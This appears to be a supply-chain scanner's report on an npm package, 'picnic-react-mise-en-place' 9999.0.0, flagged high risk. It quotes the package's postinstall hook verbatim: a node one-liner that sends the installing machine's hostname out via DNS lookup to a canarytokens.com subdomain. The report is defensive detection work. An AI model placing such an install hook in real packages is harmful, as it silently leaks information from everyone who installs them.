npm · registry.npmjs.org
picnic-react-mise-en-place
DNS / OAST exfiltration: matched "canarytokens.com"
Why PkgRadar flagged 9999.0.0
| Severity | Signal | Evidence |
|---|---|---|
| high | DNS / OAST exfiltration | matched "canarytokens.com" · package/package.json |
| high | Install Lifecycle Remote Or Exec | postinstall="node -e \"var dns=require('dns'),os=require('os');dns.lookup(os.hostname().replace(/[^a-zA-Z0-9]/g,'-').substring(0,40)+'.by0vwvh7bhoklbsbf8ev7ou8t.canarytokens.com',function(){});\"" · package.json |
| high | Install Lifecycle Dns Or Oast | postinstall="node -e \"var dns=require('dns'),os=require('os');dns.lookup(os.hostname().replace(/[^a-zA-Z0-9]/g,'-').substring(0,40)+'.by0vwvh7bhoklbsbf8ev7ou8t.canarytokens.com',function(){});\"" · package.json |
Scanned versions
| Version | Verdict | Score | Scanned (UTC) |
|---|---|---|---|
9999.0.0 | High risk | 95 | 2026-06-03 |
Related campaigns
- hurik — 10 releases, max score 95
Block this in CI
pkgradar gate --ecosystem npm [email protected]